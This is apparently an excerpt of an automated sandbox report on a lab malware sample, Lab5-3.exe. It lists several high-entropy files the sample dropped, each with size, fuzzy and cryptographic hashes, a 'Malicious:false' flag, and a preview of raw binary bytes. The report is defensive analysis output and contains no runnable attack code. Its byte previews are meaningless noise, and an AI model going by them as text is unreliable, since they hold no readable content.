                                                                                                          Preview:.z..2|.".nv...f......N.r..r...O.....T..m...b..=S.....m..V.M...g\.I.. U...Ce.JJa9.D`...Z;...S...}.O.m....Eq.....T..x9hFU..T..%....B.y`gv.......g3......^..{.......H.@.y\.3j.{.5...t$_......W"..P.../ l......h.......=.. ..G.QIt.b..u.....G.15L<...F! .'....g.}...^..j.vfe.D...*N?Cq+.Um..I.P.cU5.H..m.l~<....E.{=%k-..hI.....Rn..>#t...KV,..:u.&.t.........7>L..P....KfG.tHz.#.C....."..#.f.I.......0.).`aL.6h3.H.Q....Je...g...:g{n.Q.../D....'!....'\.....{.$.....>q.........g.7#b..W...f.,Q..>s.........M..{..agO..~^..Y..jy[..b.?<KKx..!+.g>.U._.....+..g(.jCZ.B.h?....L.e.b....@..L...*l/.<l.....>...aH6....Dsw..8.....X.v.,.6-....2.z...........IN....m.?..(p.wC................K.H.....c...bs.cC..A.:.....I... ..3-.A..$.Y.....m..M[.......~.[.$..(.n.2$';Zg..,0..?[-..]&...6%r..C+O.D.<..e...n.{.#...g&.k..QK_..p.>D&X+).J.%......`.e.\3..1I6..&.o.+Jl.p.0...~O...Gw../...j....:.u6"#J.mTI..,...x.d....M....%.....F..xU..v.......>./..R.Th.U........$.$I..>.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.912465822510075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RENccFi788fIasHfUTid3hBaUoSGFcmeykEdEElU92i:R1ojEGx0uKeY2ElUJ
                                                                                                          MD5:56BEA6B3471307CCC517F6D92CA7743D
                                                                                                          SHA1:94CF0751F45A29862C1B64D32D41B7C915E51C0E
                                                                                                          SHA-256:8F607263CAE9FCB1E238A59E9555429400AD2263F20D63DC44B15152A12207A6
                                                                                                          SHA-512:6DC4B8DC4A69D48156CF912530A3193F658EF05F711208277BA4154200AD6950BC15DA8CDDAC57CD209DE954721AF13E413F999A0778E97BD20CBA33853FB920
                                                                                                          Malicious:false
                                                                                                          Preview:PDqt......8....g...2........"....$.'<S..0......U5v8.A4..NU*.~...t......}e..{O..o7d.CU.........!J..I?YQ.k..!w....'1...........}..wH.....k....kt{..Dj.n.....H..R.!....;O.U1./.)........P.#......Jyn.......7....S..........ZL..'.]D$|.2..e..B..le..%G..vs..E....I.H..i..!..s...b...v+.]n..+....>C...5s6.Ck..G.r...^...5/J...."..@Q...0..amWFS....s.b./..v....7.^9j......5..qTx..v.h..MX.i..nm_..8;2.A....V...r..ykQ..j..i.._.jw-..@p.J.m&.]..I....#.Wyo\d0.e!..>.k)?......[b...X.....Jc.y.x....H..:.s...h..~....:M.....u...[O@.m.?.v..B#_.u.k..~.Z3^.B_g.G..=.ZT..(..{.._....%....-.'.....5).....A-A.E.p...p..<..........E[..N0n...f?....7'......;m1._{.%<qa..?..r'.../..4Y..R......-.5n.h...;...hs...H...|4...0..........s......,\.[d.#R...R..W..c}/..y.......:..@......]4..-K@...9......k...\...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.916211154642733
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Zcp3b1O8qPIqIulw/IhmkHfUTid3hBaUoSGFcmeykEdEElU92i:Z03cQ1uK/dGx0uKeY2ElUJ
                                                                                                          MD5:BBA6836832BE7EFB7FACB861C577AB8E
                                                                                                          SHA1:7B34A59A7CA38D7D2B24A5B958605A83FFD103FD
                                                                                                          SHA-256:F58B43D8A3E7B9653D26568BCB7CB3B2C02DD366B0DBB446D2ADA3D1E32DBA51
                                                                                                          SHA-512:AE232434E3E6E560C4B1510ACF7C3D7BB2BA831E6929EA3491AD8752C8F6745948A8F4BD348589D870D96EADF80D8A0C952528C037AAE93A8A8DEA3C582AA07E
                                                                                                          Malicious:false
                                                                                                          Preview:..g.P.u.....m..X..".y...;P.|.|3.=8.P?.b.[.}Y..R..x..q,.<l...Dh.xRuH..]p. <1..{,]'!!0...[...R.X3...*R!.u.p.T...1......R..\@*.zJ}.......Eewt.E.%g...h..."2Gq.&p.6.D.0....x/]F \m.._.B.#.<[..~W.tK...+.,....L.c..f.{.6F.......M-R.......N.7DWAL....K...4^>..5..o..`..q0~....@...*.[h...e.^...x.6uN.7.6DT...ae....?5....;... ...p......5c...J.S.S........U.X..pnfC...l1...7.6..VB...R..3(.@....|K..........)!b...)....(iq{.....b..t.......E../.n?.....:..U..t//...&l.o.y..Z..D&~_.._..|..n..(6...<.|.KGo.Y.d@.....N.....\..J:vn@mA..c.o.....v9.....U|A...s..s.G.@<....v/.?.vT.G..G>..V...b:n.....j5x..k1..._....rmSAg.....8..NG .9e.<&.....C@..#Er.Q....9.y.....i......%^...1.+..bJ..,..#Um...\.-.3...g...j....|k.zUb...W..*3....X.{.kF)...{..L...7.a..UR......./n._..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.912609389801439
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uiYyBtopW8xz2eRCliEPYHfUTid3hBaUoSGFcmeykEdEElU92i:LnB2p9zKnP/Gx0uKeY2ElUJ
                                                                                                          MD5:68EDBB18A7988E1648940514FFE30C6E
                                                                                                          SHA1:618CAF2DB8883742D7C8085E2109344A9EAB00F0
                                                                                                          SHA-256:6467136E0205C6556B8E78E7704B1C4D24D79513A536773E93581571B0AED07D
                                                                                                          SHA-512:0477EC3850B6F1EF7E990A97FBDDA67D6CFBDA62298466995A50A81BDABCDC0745DA43E6E5F9122B170A6D3D89ABC98D7AFB02C917A9BF924A7B4A26CFE927DC
                                                                                                          Malicious:false
                                                                                                          Preview:..._E....w..#.fc..3.c..i[.i....z:u{u.3.(d[&....,.om...@.t.7....Zi..y..C.t....8.........=...{uG.\.[..=R9C.....>^F/.XzHv.U.~....b.E.I][.J9gZ.@]/x3..k>(.]-...X.oO...yW.-.-3...aF.c.4.. .6&..>>.\m..f.eEL.i@..F@.-;..|.'j..2.?....Q........v...)QPhN.r[...%!".J..>2.X.6B.yQv.....#e,..v...r.{...`rB"D.L...5...._...E..D..j.............,.@...!...5W.%..R.n.5..X..s.....'.h.z.*.e.=....'x':DR.M _..^uO..U......Nx]..9f..-...TX`.T/.mvT1.&\E../...D..#..q.=..h....&]r. .<..3..AS..0.d!Hi.....S^..H..;.!/......bi...d .$<..L:M5}i#.P.A....w.......71.p.&/......$..&8.~.....A.4.Q15S..)D.W...:....N..Y..u.2...Y..n.2..x.G9:...sj..%.S!.~.......GR..>.^.8M.x.ia..4.$...8....^#-R.p..|F..&?.-F.-..&.s.b..&6S.G~.....m.g..h..G|.7...|..A.5E.#..KJ..h,...,tW*.Q..wL...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2432
                                                                                                          Entropy (8bit):7.924384102632568
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eV8ZogcrDdTtN55eEzKxZRHfUTid3hBaUoSGFcmeykEdEElU92i:08ZopdlocKKGx0uKeY2ElUJ
                                                                                                          MD5:9367E344A7F348A604D5144734B0E998
                                                                                                          SHA1:8C897E639A952704AC1A3BF81F0B378371DB16D2
                                                                                                          SHA-256:D55D35F9C50BB7C0F54F0CC3229AEF3AC88C20D247BE5226A17C5934338F17AF
                                                                                                          SHA-512:3DC39371CF3BD1A2F5B980FE1FBA0E7ADCF58D29D0EF20177EECCB81E0567968EA42DB9DBC0DEF3BC7B902E6F91A475DE86206557DB32ADDE0A2432A6126AC8E
                                                                                                          Malicious:false
                                                                                                          Preview:>}.l.>.*.8Y....wE..o....etf'.]..Z..wg.L..BY.T.....#.f.q>.M...#P.-....~...L^.b..@Z.M..K....}..>...x.}..t'K6.{.a.F=........Dh.2C...9....4...7.z...].....n.\0....RO....0.,.J...}.`.......2....%}.d.......K-...i+..|...d..........E.._.._..F..V...xiM. .....7.n...{$7.+LE......6..i.nk............g.mw+..g../).-..@.LT..TP....8GM....6....|+..F...\*...E{.%...M.i..z.......jzrM....f2...y.+....'a..gt0.....#~H..xX_..>".K...PFm|.M$).D.&.d.'.,y..U6e.s.v...%..F;.....A..{5.Y..j^...S.Q...4..h...e^.gK......?..p....lK..G.Afa.."....5.;"|....fk.&.#.6.wEl9.cN..in...zM6h.}............Q.oM{..!t...........q...c...z.....4..*.%.2..H..6.....~.P.E|...uU'...z......4......Me......|.x*9....el..u.8r..(.........&...O.n..3m...v._y.q.9..].a.f... ..U...:p..]b\.>jG}a:3*.CW...............xK..t...]z....b.....n..t.j.V.@..V.8Y.....L.._L.W....*j....m!..b*..2.=.3...V4...7..}..._u..eAK....E .w)...K.{.}...\-........5.C@...2P.....z.$..;..6.C..cD...^..,......?..<.?..-....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.935127271149787
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aCuPz2lEDRY+0wLMegb4QWsod3aqoaGerDcs6iJb15egHfUTid3hBaUoSGFcmeyS:anVDq37eGad2aGerDcs6abrWGx0uKeYO
                                                                                                          MD5:F29EA47F92FA22DA237A2A181A90FE14
                                                                                                          SHA1:B1C2E31D3291B08BA38FB1CD138B5698649C3C37
                                                                                                          SHA-256:AF8FDCBF18800CA0FB388C9484DF67BE5F06994981BA9C4935854ED97A35A967
                                                                                                          SHA-512:EC876F9D9A0846853310511415E21800711F696AFB0311E59BB7FCF353D8CEC0C9E013086AA22582BA4EBC8F4AB146B0B5523B4E984FB20F7CEF9BF28DD7584F
                                                                                                          Malicious:false
                                                                                                          Preview:,...*..W .m..<.b-...]F.g..Y..]R..}....ZX.....';QV;]...}EpZB...P...p..S........T......~..#...k....."...L...g.X?.j/g.@...Wj....2...0.`.X......x.5a.....I{c 3......'.[F.s..........e...^....&s.......|^T......eL.......q.OH..Y.QK...o.$8..[...Z.DW.....).z..V.1...W.....?....h..{..2.WS...69......y.H...9.....#wt_.7&.%.'qp.& ....a...u>.......o...6.@.....9.+\..'..Sj\..ACx........|...b...I.C.<.....p*..+.ht...;.j......ys..8.z............k.jT.I.(.0WP.'.NZ..i.LFN.p._....>....4.<c....^..#.Gp.q.D3.<.H.0.P.3.......2....u....f7N.......9...d..aZrg...W............x....v....W.\R8...8c.&.}&..(..,P.....1...~f..'.O.u8Z/....nQ...v...>./..N.V+...u.o.(.!._R...-..IW@....H3..(OH"...Z.q..oI4..3y.Y................ .:.G...F...6...S.w[Q......[&.UR......_.g.....-.hLCc...R.......C6.6\>I>..X.=....'....;..&.9`.C.f....|0.z.W....M..T..H..k.._.Z..ZQ!..^}D..V."K2S.M.&.]HR...H..z.M...F...o.2..'...?.....kx..K.......cga.J\Bw...![......9...1C....J...%......*..VDzBx.;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.932874306632032
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9dGCj9aMcV7HVsrrphuFDiHfUTid3hBaUoSGFcmeykEdEElU92i:iim7y5hERGx0uKeY2ElUJ
                                                                                                          MD5:D945AE37CE7F770925A3BC7413F39264
                                                                                                          SHA1:6599CCCC22FF53AC44733990B85B1646CE45AF01
                                                                                                          SHA-256:76AC69A7821E0A3DB0E8E7C8CE87A0058918C781E10032355159E0FA0275CC35
                                                                                                          SHA-512:302DE75596A317A85D6FD16F44EA4A3875BB7ECA32ACAC4A16D23A2204F1CC7544AC522B09CD2D84BDDBDED313CEB6B1ABBCF892A7F0EAF8024326516B230E58
                                                                                                          Malicious:false
                                                                                                          Preview:.b........)...4.0...w....H..6.l%..yN .H.......sq........e...0g..GY...$A.P.|K.....(.1....>i...0.M..K}.....\.?0......Y.>.........U........F~.D..5.v...(EU...1..'....]...o.....H...R..."..%Q..i?..s.[.}..B..,.).v.j..X....lz'...K..=...R.!w..q...bzB..Lf.h.I`..3.Be...A..=w......:.1.n>..:c.~9...e..A..u..T.."h.GTl#:..l}.).tb.S......l..KT.!..\3;.S7j..^.&.|x_&.....I...X^..{......bhT...F.$....}../..6.r.....@"... s..]..:....>...{/<....:,Y.q..:..m.Y..K..l...W..y)>.P.O.+....]C..$.fD!..L5..,...~.X...?O......r..}Z..U.Z.k..._{F-+$...?.7.3wJq..^.D..1.!.x:.X.4..M....7.N...a{..0D.c...?P...u..PA."........Ty.=6T..F...uX.....G.b...........5W...>o..2...I...#.....2.Vf..x[l.j@..B.E<...+V..=.......~.0.P.\g.EO{...9.......JO...5F{..?=..?..?2-..s..hhz...#)..y...~....2OG.......U4...h.1.SV;.w.4p...c.6,._e S.."..<lu.,..x....=\.[pza.d..zt].|.4...C.4.......w.|.5.Pe+>...}0..<y/{u..|.Z^.M:b..QW.x9..@M.uqF...$q..a.V....9h.?:p...5.r?..^........Q..........3H..R.CE;../...+.%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.952339471215296
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:4KjJauc9WzzI6iU0bSQbGCQkGx0uKeY2ElUJ:bRSY0Cb
                                                                                                          MD5:E891D3E0274C46717B3045298B60433B
                                                                                                          SHA1:CF49CE8738FB798C56429F9532C8395591B5BBF1
                                                                                                          SHA-256:F632A91929967BA8A92730EBFD5F7174E048378FE9A045D066629092034DCAEA
                                                                                                          SHA-512:C5D6E705C52BDCF9C386BDA4492735ACD755075650538C041499A8F09D62AD71D52A41F16EE3E4F9A50D60F9FF861B99825438AFF7058BC7634DAF590E9CE1A2
                                                                                                          Malicious:false
                                                                                                          Preview:.,.0t..A3.......*..-dK.H.."..fGA...D....}:....:..T....fb.7....p!C.XTu.......i.&.....).4.....2E...>.Z.@...k.r.f.L.a.m....-X..|....O.yJ...Pr....*7.i.....C..+{VmTh<..1.....o..yH.i.r...../.qv.P=. .Hk....~....xl..u..,>".YE.....%A..zgg>+..mL._..5;&..?./....X]../.g.9Q.Z..-2..V...n.<)......sU*.....L.........9..C..(.M.....Z.....t..k).3ST.._....l.9.P..2...$:)..o..`.h....~R....#....t.Q/+D.18._.....O.bY...+c..j.....6.....5.YLI.M.~gL...Q.D.N..D......&.....gc.)n..(.|D.Lp.....)...<..N&{ns..!...q.v.q6..v....{..7..9m_.@.....*..U.I....vXK.`..../_.,.n..<.b*...].H^X..A^3?.m....D.......O$.|.........&..7L...H....^..L...]....D.b.@...G.3>}..`.g.A<.MSYK>Z4.`.....N...-!..?..z]....z...n.'f.b..\E..K..2...h..2A.....17m..;.......O.KXp5.@.1].{I~..)......v.O*e.Q.[..E...}X.2b'~I,.6t.o..u...+.?...g.fP.C.<....)...La6...`..8ic.t..~..u.P.*......._.ey..)....V?c'.....zd4..@\..b3.cJ.j}..3.B...t.cX..'..dU..O*....\..5V[.d.rVq4>.#D#..4..-85F.l.O....j..B+.F....(.2E'.kHIo0...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.916233550845099
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tGorU9oeydwUb6Hh1mnoHfUTid3hBaUoSGFcmeykEdEElU92i:vo9oeyPg1OPGx0uKeY2ElUJ
                                                                                                          MD5:88D74CEFA6694431AE0F03242DDD689D
                                                                                                          SHA1:2FF1FF95D385A64AF44C4BF816F4EC161E50D8AC
                                                                                                          SHA-256:627CEA229F677E3C4A92BAED1D7595B6FEF4AEA6D3FDA2ED6F59013768466117
                                                                                                          SHA-512:2A611CBAA75676B3B851AD2767A464A72CCB33A219E6B79CC34C0025C20E70AF31C7B1A2EF9F020E55377F00E752F5113010B984B0FBE2DA7B55BAE02A2F254E
                                                                                                          Malicious:false
                                                                                                          Preview:..H}.8...h....+.m......x[..S._..s../.nnbC.x.U[;..l..{'1Qg......4{,..7.M......y.:4J.VSh.w-.t...;E....H....3.\fg. ...>.-.`..Q.....osct@>.j.c.$z(.@.4;.mx...A.Q...4zH.P....z.w.B.}.R.\.....$2..S.u/....p(..d0.Q.?..+.a..k(.e..@....Lk....U...........{...).$...3c.E.*`.{..?.....G....hF.l..N^...H).y1I...\....5E{..TDo..q.0....bN...1....j.............".kT....\Ub..U..dzp..y.Z......& ..ax.%.w..~K.O.dh oT.;._[l.....~.......<E.5.L..8.M".w..?.....i...n......$...>Z..+o........^3S.....f....".K...I5...q}.i..3.T.J.&.94o.D9k..9...."...c[..B.M<.T8.Yjk...x?Wt4.g....k.K..s...O.>...90V.^.c.@..;...m.Xzg.b.......n...:I%.;.(....^.s.hn......27R~...WI......t..y...g.Ki!f.vF%....S.^6..W.!A...e....Y.;6...M.vY..,Z....K..&...;.?...Q....>i&{.F..KsG..0...t>..cO...\..X...\...|.D.6."$.....1.3.7c.4\7.e.b.~.....l.~.....@.....K[.-.F.v.b.{.$G.m~R_b...K"%......?...F...#DO..z.........!z...a...T...Zj../..Z>._`f.t5........C._4V.+.M:&..C../}6m...xs!^.%..r.t......^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.946282407620913
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OmzKPhPB7pDzK2As0rXxEJBpid7cwd3kA3UHfUTid3hBaUoSGFcmeykEdEElU92i:OyKPL7l2M4Brd7cwddGx0uKeY2ElUJ
                                                                                                          MD5:1B614D8D7B7678FD23C6CD89D12F33E5
                                                                                                          SHA1:7C4E3571EBDAE2451242F83489B617750220E479
                                                                                                          SHA-256:6A88CF6870AF3312A7F099F32F93E91B7EF62707A9C43FF4875CBC3F2D35618A
                                                                                                          SHA-512:0A5FEA1448B982F54B21F86BF6816C9FF39A0118BD300A68D24C4EA5A7F60237E83613900113338430D03ADA28025B044718B96BEE4E5B5475D18E440BEBCD57
                                                                                                          Malicious:false
                                                                                                          Preview:..1RvH..9...B.<.>E....C.G._|...?..&.?x..a.QO..]d...j....L.-0Ib.s/b3R.....@.F..gs.."Bh..?.......R..f.v.#q.yRmh.8....B^j...4a.h.....^.-......u...:.\@.qV..2u-....i*..{.k.sgw).#"y\..yT..i>.BK..%.E......0=..3...{..,V.H?.#.....!..d8...K...3.t..K:HZ....$7g|....8.g4..f...Vg..(|.e_^J...L..M.L..{.8..\Z(........4......R....8...\...qq.N.y(..Z..V.dG.!.......f.#'M..m..t..b(F..C..[..o..(~.tY+.....h.pB>.u......~6x......^H!?|?...r.G...w0.U.u....9|..YF#'v*...d.0..*3.......%....n.{<Z.#VS?.K.=Gp:..1(?P]..y.....s.....i...YR7...W3..y\..wS.j/.;.x.....$.T...Z*...Bd..+.L.D....q....MX+.<t.".I^..~v.{..qba)..Z.......C...........5.%`..........._..w.=2.t-........4E;...O.DA...MY|[..A......~...uI6...@.h.+....u..g.%...'..$..,...-...7.Q.....uC..R..h..Fj..Q.i.{,.........b.X.G..%.....(...jL....a......&.@...4...../.#7........f.>.=<...v...G[=..5(.y.v...*.pj......}*.J.Hc.u...eJ.).5,-...uHX....%Ei..z...v.;..Q.a.-.<^L...x.........+!..Jtl.-6.2.fZ?lm|>b&..ep...fV.W..LL......T...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.914829606758762
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZCeRe0lqcQBZ8QHfUTid3hBaUoSGFcmeykEdEElU92i:ZM0lJQoXGx0uKeY2ElUJ
                                                                                                          MD5:4A78DC1B784CDB7084C2CDEA0F76BF47
                                                                                                          SHA1:5965EDD201A077EDE995133AC624A29A9F0F7916
                                                                                                          SHA-256:34226EF281E0E21BD6FAA742138AAF814F42062D724053616A679BE39F2CD190
                                                                                                          SHA-512:6EDA190DF56A68A31455FD809BB5E95101D462103017492130E2C7BED9FE4E51F87B9502C2FC2FC2B715BDB3BCA6584D2100301D738BA1A8801F6D90A65920D7
                                                                                                          Malicious:false
                                                                                                          Preview:.k....Y."N.0i...A...(o...IF...y+...-,...+.................>.T..._..*..> f.Q.C.cO...e...,.+.e.K...4......L@.<D.F......N.C-.J....6...j.......U .\..({gV..L'^.'.`.fM._.!......Ym...Jdx.R[g.m..$..*jt.....'.7.g.|j!.e.[.2:..}...aknPx.....)..$o....N.`......yc..$w...2.%.b}p...3..1....T.+..... .L.>I/Ss.`..z..M`..M...<....1.......+7.....j....8t..H.k.|... ....X*..pP...n..`F.{UI\b.[Q.......a.Ys.k...$..aoI.$...c....4I).2....z..y......V..Q{.~mS#..mr..4.6v..{Sy..x/........../.".n...~..R9...csV36....L..xo..Vi...RC.d..,.Ye..*.G.................M?.-.]\..w.2.T...8W2*....H.j]...IC&..m...=.....v....".w.....P.Z...Z.........w.UN.>...&R._... ..M.@./......w."Wa...(7.Qh..~.SR..2..eZ..=..s.....6r.r....|.'e.|...<..4.Z.e...a......'.Z..#).7^......l....Y..|..I.zP..K.F....._5...z.R.u......-r..c+..1@..kyB}.N]..4...i.p...;..,...#...J!.Q.E;..i..#....me6.d.y..^[#.Z....2.N....<U....C........L.t.-~......^).k...uqS......u...C..AQ...).mM._..X.M.z...k...v.^..Gm...^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.9287854253969146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EZwq2l5QjKJEf2p2KHqwq4y4IqEQHfUTid3hBaUoSGFcmeykEdEElU92i:+D2guJEf2ICqP0IqEXGx0uKeY2ElUJ
                                                                                                          MD5:8C1AB0FB54969D73720B2D78C337CF1A
                                                                                                          SHA1:D36801350D267ABFEC1EA5B373BE57302A59CF7E
                                                                                                          SHA-256:1C1E051BD3B4EBAFD5FB4E65F9D4C792C20A0DEED707908CF7B6D3402FE05F36
                                                                                                          SHA-512:F8C7D30502A26E3904F2EC3E674FC288EB67A518EABECB5F3C6ECC17444E811FC3A83B369A7379F1B0E96FD4EE0579C85012CBE9FA89BC3C64FE7CD368456BB6
                                                                                                          Malicious:false
                                                                                                          Preview:C..G...._.*..].?...Ni..u.N.....J.........&....=&.....k1...i|.....}oZn.sfR~?......u......\.~}3.JO#..}...=..Y....HJ.....8,...|J.(.].S....9.pAy6....}...0.....|a...F.....z.`l.k"..._...h..r....4.!.K. ......*.8...kL...4T...i..D.m.q.V..j_.....1......8.8.....WF.l.].T.|Q)...lt.s..7.w.x.e-...N.`..7...@..d/..V@.Q.po.,.d...]....)......:.ED.z..(4AMYR..X=..>r....5....Y.SjZ.-j}Y.I?.WKO..e<.h.}.G.........P%2...K....P.r}v.`....c:...`...N....[...-.d....TK..#-h.Q..;...B...&.}V.N..RP.;....:.!.....X.......5*'.w|...lU.W....E..{c.Wt#1a.H....)L|^.Y.eT...T.0z......B.9`XJg.&..&.9.M%..O.........<eH....0...L..A+~.....p......j..mjf....oY......9zz...$ Co......]p..mI....(....@.?CF...].Z..Q..Z=.f..m./......{........~....".L...c5.O..r0......>..A.i..f?.c.1o.".Vc.....#........N....t.M.T....T....Sw...0._.'..!..g..^loZ..HIw.]|..a....a@...[..<;7.!.Tv.1.3..O,.^$..}........z(B1[FFYzj.(z......<..H$...RN.M&..@....v?...#.~.!.8N..r..M.8T.h.=R.......@...B..!......>|x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.944960604078068
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:07CQQ0SphHpSeY+pqEQOxgX0bIlDboDHfBpR4oiqHfUTid3hBaUoSGFcmeykEdEb:Ik1pldpbTIhMD/8FGx0uKeY2ElUJ
                                                                                                          MD5:58DCCDE5A3AC9CC3833BD0647F06AED1
                                                                                                          SHA1:E94CD28D63DDDAD0E69A9328578B79FEE7C07573
                                                                                                          SHA-256:DF25A75A52057ADC5CA43ACD4B3E002A0925A2B644356162FD6F89059A2B47F2
                                                                                                          SHA-512:62399716E353C55FCE34271E1B1777BEB6D4979C25438C1672B0D058A4A7900F591AAA4806CED8B6BA372A5AD427FF53F74EF841603DAF68B069B2837020D5BD
                                                                                                          Malicious:false
                                                                                                          Preview:.>)..ZR..i...k(h.w..v.C./7.n......."..p..C.....ud..Q..}H<.U........r.F..x. .....;.3....:..c.k..9...p.Dz.u......s..P...y..za........tC.._oQ.S.~.......Z..A.D@ ....<yHf;......Z.P.....K.s.&...-g...Un.g...J?..{.vGsr..Yi.[.M,98.O..T.....;Q..4.k....M5.Nj.d0._.3}.{c#.Q..1..1.;...Z(.....#..Gq'~d...*...Ri....X.|.O.%..K...eu2.?g....>!AP.3.v...m.!.d.T...t..p..o`.U,..>-X......Gh..:.B;...2>`..=....&-....m{.8....%8.G..i.g)!%..n..-.X._Y!..]S...@...H7.V..%.re.)..._..N6.......?.[2.'.....Az.G. }'mGnnC.....9`...s.nk.......Cf<.....B.e...52.......h.....#...0?..;.x]6.....y...H`...lm....D^..n.5......w..@.\..,.C.h>"1;u.,......;1\.c!....#A<.8+..!_..e..P.Vi.....M.R!>......s.#94.....,.6\n.(.l~.C0......c.A...08(Dh.rNM..a/.`].j8;.F.i.(.S.h....\...>d..;\.Gkf'.^..x..x].|...n....f.Z#...S.eA'7.5sC.y...X..".N$H......8[s{8.6...;.U.g.E...M..HS.f:....*i.hW.g}LY.z...J..`.mKtS...wBRxk2........r-....G...#.B;..b?_BvE$._ZJ.^.x.4..*.....50.t...CXw"+^.+.R..]..e..[..?%.R.e..f..qH=.5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.944725856399669
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qMmEE7M5m2r+y3J4YeV800m9fORa7yBLejySzPXiyioHfUTid3hBaUoSGFcmeykt:qfQgeJ4ymQJLKy+PX2PGx0uKeY2ElUJ
                                                                                                          MD5:B6A54722D88B79B162BF59AA8AE8597A
                                                                                                          SHA1:7F0618BC91B8CDFADD5472650BDD00C79FCC988F
                                                                                                          SHA-256:740044C8C70671D0880B238750AD2B88A8957AEF122FFC934FA90045E09BBAF8
                                                                                                          SHA-512:C6AB8E63CDBC22A74A21A281732E765F6935366C9656E130F690D777821706760FC26D9FF5E4C0AA428CFBC4D9F220F775551C2794254FC4C1D3FFB8628F52A5
                                                                                                          Malicious:false
                                                                                                          Preview:.0zl.)Ho....j}...>.(J....y.. ..{J~N...H./_g.=.\.}...k.E.jn...h.Y...o..9.Z.J7.i.>.?e..S^w...A\...(d......*..[..q.... .........:k.....2\A(l..0...ES..I3..&"o.-.w.:....b.u6.F L...d....]u...(..P..c.|...K...h...#~....V$T.:..I.W.(k....~]n"...w..m...|...x....6...J=FX..$.......F....E.....@x".>.%B......a13.7..I.t...5..&....&c>[...t7...h+R...!....@&.(...x..O......V.....V...X>...=au....4.uE.U.5..................w.Gr....i.o.m.Ql.c..@w.D.+B]..n.0........B...x....do.Y/....%..K....Nem..L.._....A:!,..Fa....y.>x.n...~..q......^R..w..#..{.&.`...?.0`p.._?8..&~......#.;.d|0.......K.ao<.b.=.........y.&zb;...3.....v..b{.-R.$cHDH.....L4.q#..t.5./.B...Q>...(W.K.[g.=.s...L....}<*..&.W.8..:m,.+h.E.6....^z....R..Uw}.+#..`.....3.._..0 a.{..eE.>....K..z..xY.........H.C".R.V.s..HR..<'..^...D..z...Z.}5\h{VJ..a..................)..H?.....Qk.0...+j.m.U.".......s...w..Q......?>..C...l.....x.5...E..,?yh.`.Yc..m....E.3G.b.p.0W.R..M.o,-[.......4.....,............d&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.925764483062937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oa418LdqqJeLc1IIec62aHfUTid3hBaUoSGFcmeykEdEElU92i:oh8FsZIX1Gx0uKeY2ElUJ
